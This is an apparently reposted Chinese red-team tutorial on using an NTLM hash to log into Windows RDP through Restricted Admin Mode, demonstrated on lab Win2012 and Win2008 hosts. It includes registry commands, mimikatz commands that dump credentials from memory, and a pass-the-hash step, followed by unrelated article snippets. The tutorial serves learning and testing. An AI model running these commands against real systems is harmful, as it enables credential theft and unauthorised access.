红队攻防之hash登录RDP

news2024/12/27 0:31:10

没什么好害怕,孩子放心去飞吧,在你的身后有个等你的家

Restricted Admin Mode

受限管理模式是一项 Windows 功能,可防止将 RDP 用户的凭据存储在建立 RDP 连接的计算机的内存中。

这是用来防止用户(管理员)在 RDP 进入被控主机后,密码保留在被控主机内存中,从而被读取凭据。

受限管理员更改了远程桌面协议,使其使用网络登录而不是交互式登录进行身份验证。有了这种保护,建立 RDP 会话将不需要提供关联的密码;相反用户的 NTLM Hash 或 Kerberos 票证将用于身份验证。

新建DWORD键值DisableRestrictedAdmin,0代表开启,1代表关闭

REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

在这里插入图片描述

查询DisableRestrictedAdmin的值,0x0表示已开启

REG query HKLM\System\CurrentControlSet\Control\Lsa | findstr DisableRestrictedAdmin

在这里插入图片描述

Hash登录rdp

因为"Restricted Admin Mode"的存在,让ntlm hash用于网络身份认证,我们还需要什么明文密码,直接hash传递不就登录上桌面了吗

但想使用hash远程登录RDP,就是根据上面信息判断是否开启"Restricted Admin Mode"模式

测试1

这里我使用win2012尝试用hash登录win2012

使用hash登录rdp需要客户端和服务器端都开启Restricted Admin Mode

也就是这里两台win-2012都利用上面注册表方式开启此模式(默认是开启的)

win2012客户端命令行执行

mstsc.exe /restrictedadmin

image-20231128220848990

这里是无法登录的,因为Restricted Admin mode会用当前Windows凭证进行登录,也就是我win2012的凭证,这肯定是不行的

image-20231128220954809

在win2012机器上进行操作

使用mimikatz在线读取SAM文件

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"  #在线读取散列值及明文密码

image-20231128221456259

客户端管理员权限运行mimiketz进行pth,这里使用win2012的用户名和hash

mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:Administrator /domain:xxx /ntlm:x

image-20231128221111077

执行后弹出一个cmd框,这时我们伪造了win2012-R2(192.168.1.11)的凭证

cmd框内运行桌面登录

mstsc.exe /restrictedadmin

这时我们就是利用的win2012的凭证进行远程登录,如下图成功实现远程登录

image-20231128221250958

测试2

尝试对win-2008进行hash登录(WIN7同样的操作)

正常win-2008是没有受限管理员模式的,根据微软文档,给win-2008打上补丁KB2984972

image-20231128221324589

查看注册表,发现并没有DisableRestrictedAdmin这个键值对

REG query HKLM\System\CurrentControlSet\Control\Lsa

在这里插入图片描述

使用mimikatz在线读取SAM文件

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"  #在线读取散列值及明文密码
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

image-20231128221434852

客户端管理员权限运行mimiketz进行pth,这里使用win-2012-r2的用户名和hash

mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:Administrator /domain:x /ntlm:x

登录发现不行

image-20231128221521189

在win-2008修改注册表,开启受限管理员模式

REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

image-20231128221544660

就可以成功登录了,说明win2008那些打的补丁,受限管理员模式是默认关闭状态。

注意,受限管理员模式只对管理员组成员有效,如果获取的用户只是可以远程桌面但不是管理员,那么就无法利用hash登录的。

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:各家兴 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

CSDN:
https://blog.csdn.net/weixin_48899364?type=blog

公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

博客:
https://rdyx0.github.io/

先知社区:
https://xz.aliyun.com/u/37846

SecIN:
https://www.sec-in.com/author/3097

FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1265677.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

VT-VSPA1-1X比例压力阀控制板

替代力士乐同型号,可以完全互换使用;适用于力士乐系列所有无电位置反馈的直动式和先导式比例压力阀的控制;外置欧板式连接,VT-VSPA1-1X型放大器配套支架型号:VT-3002-1X/32D或VT-3002-2X/32D; VT-VSPA2-1-1X/T1、VT-V…

面试必须要知道的MySQL知识--索引

10 索引 10.1 数据页存储结构 10.1.1 数据页的各个部分 在讲索引之前,让我们看看一个单独的数据页是什么样子的 去除掉一些我们不太需要那么关注的部分后,简化如下: 也就是说平时我们在一个表里插入的一行一行的数据会存储在数据页里&#…

DDR-MIG 学习记录

MIG调试总结: 对vivado软件中用于控制DDR2 / DDR3 的 控制器MIG(Memory Interface Generator)IP核进行了仿真测试,以学习如何用IP核来控制FPGA板载SDRAM的读写。我们只需要学会MIG的接口控制就可以。 ①配置IP核 Xilinx 的 DDR 控制器的名称简写为 MIG&…

解密Long型数据传递:Spring Boot后台如何避免精度丢失问题

前端和后端之间的数据传递至关重要。然而,当涉及到Long类型数据时,可能会出现精度丢失问题,这会影响数据的准确性。本文将为你介绍两种解决方案,帮助你确保Long类型数据在前端和后端之间的精确传递。 精度丢失测试 访问:http://l…

深度学习可解释性Python库

本文整理了10个常用于可解释AI的Python库,方便我们更好的理解AI模型的决策。 原文阅读 什么是XAI? XAI(Explainable AI)的目标是为模型的行为和决策提供合理的解释,这有助于增加信任、提供问责制和模型决策的透明度…

SAP FB01 更新采购凭证历史EKBE

参考链接BAPI_ACC_DOCUMENT_POST – Vendor Down payment: Update Purchase order info and PO history 不需要链接里的替代过程,可以直接写在函数BAPI_ACC_DOCUMENT_POST的增强结构EXTENSION2里 需要复制BTE增强1050 在其中调用函数ME_CREATE_HISTORY_FINANCE 即…

工具 | docker删除不使用的容器

工具 | docker删除不使用的容器 Docker 清理命令

ESP32-Web-Server 实战编程-通过网页控制设备的 GPIO

ESP32-Web-Server 实战编程-通过网页控制设备的 GPIO 概述 前述博客讲解了 Web 编程的基本知识,包括 HTML、CSS、JavaScript 三个部分,从这节开始,我们进入实战部分,在实际项目中进一步学习 ESP32-Web 编程。 GPIO &#xff08…

产品解读:GreatADM如何快速改造单实例为双主、MGR、读写分离架构?

前言 单机GreatDB/GreatSQL/MySQL将架构调整为多副本复制的好处有哪些?为什么要调整? 性能优化:如果单个GreatDB服务器的处理能力达到瓶颈,可能需要通过主从复制、双主复制或MGR及其他高可用方案来提高整体性能。通过将读请求分发…

免交互语法expect

目录 前瞻 相关命令 范例一:免密登录另外一台主机并创建用户 范例二:免密登录另外三台主机并创建用户 前瞻 expect是建立在tcl(tool command language)语言基础上的一个工具,常被用于进行自动化控制和测试&#xf…

前后端分离开发出现的跨域问题

先说说什么是跨域。 请求的URL地址中的协议、域名、端口号中的任意一个与当前URL不同就是跨域。 比如: 当前页面的URL请求的URL是否跨域原因htttp://localhost:8080htttps://localhost:8080是协议不同htttp://localhostll:8080htttp://localhost:8080是域名不同htt…

校园跑腿的核心功能

校园跑腿是指在校园内提供各种代办和服务的便利服务。 1. 快速送货:校园跑腿可以提供快速的送货服务,包括食品、快递、文件等物品的送达。 2. 打印复印:校园跑腿可以提供打印、复印等文档处理服务,方便学生和教职工处理各种文档…

Glide结合OkHttp保证短信验证接口携带图形验证码接口返回Cookie值去做网络请求

一、实现效果 二、步骤 注意:仅展示核心部分代码 1、导入依赖 api com.github.bumptech.glide:glide:4.10.0 kapt com.github.bumptech.glide:compiler:4.10.0 api com.squareup.okhttp3:okhttp:3.11.0 api com.squareup.okhttp3:logging-interceptor:3.11.02、自…

【Web】BJDCTF 2020 个人复现

目录 ①easy_md5 ②ZJCTF,不过如此 ③Cookie is so subtle! ④Ezphp ⑤The Mystery of IP ①easy_md5 ffifdyop绕过SQL注入 sql注入:md5($password,true) 右键查看源码 数组绕过 ?a[]1&b[]2 跳转到levell14.php 同样是数组绕过 param1[…

C语言第三十六弹--实现转移表的多种方法

使用C语言通过多种方法实现转移表 方法一、普通法 思路:如图实现多种操作,首先创建菜单,需要运行一次再判断条件,所以通过do{}while(); 循环来实现多次。有多种选择,使用switch case选择语句,再在对应case…

蓝桥杯第229题 迷宫与陷阱 BFS C++ 模拟 带你理解迷宫的深奥

题目 迷宫与陷阱 - 蓝桥云课 (lanqiao.cn)https://www.lanqiao.cn/problems/229/learning/?page1&first_category_id1&name%E8%BF%B7%E5%AE%AB%E4%B8%8E%E9%99%B7%E9%98%B1 思路和解题方法 首先,定义了一个结构体node来表示迷宫中的每个节点,包…

计算机丢失vcomp140.dll是什么意思,如何解决与修复(附教程)

vcomp140.dll缺失的5种解决方法以及vcomp140.dll缺失原因 引言: 在日常使用电脑的过程中,我们可能会遇到一些错误提示,其中之一就是“vcomp140.dll缺失”。这个错误提示通常出现在运行某些程序或游戏时,给使用者带来了困扰。本文…

Java数据结构之优先级队列(PriorityQueue)

1、概念 队列:是一种FIFO(First-In-First-Out)先进先出的数据结构,对应于生活中的排队的场景, 排在前面的人总是先通过,依次进行。 优先队列:是特殊的队列,从“优先”一词&#xff…

免调试计量表,4G无线电表,可以远程抄表,安科瑞ADW300一款全能实现?

1.概述 ADW300 无线计量仪表主要用于计量低压网络的三相有功电能,具有体积小、精度高、功能丰富等优点,并 且可选通讯方式多,可支持 RS485 通讯和 Lora、NB、4G、wifi 等无线通讯方式,增加了外置互感器的电流采样 模式&#xff0…

计算机毕业设计 基于PHP的考研互助交流系统的设计与实现 Java实战项目 附源码+文档+视频讲解

博主介绍:✌从事软件开发10年之余,专注于Java技术领域、Python人工智能及数据挖掘、小程序项目开发和Android项目开发等。CSDN、掘金、华为云、InfoQ、阿里云等平台优质作者✌ 🍅文末获取源码联系🍅 👇🏻 精…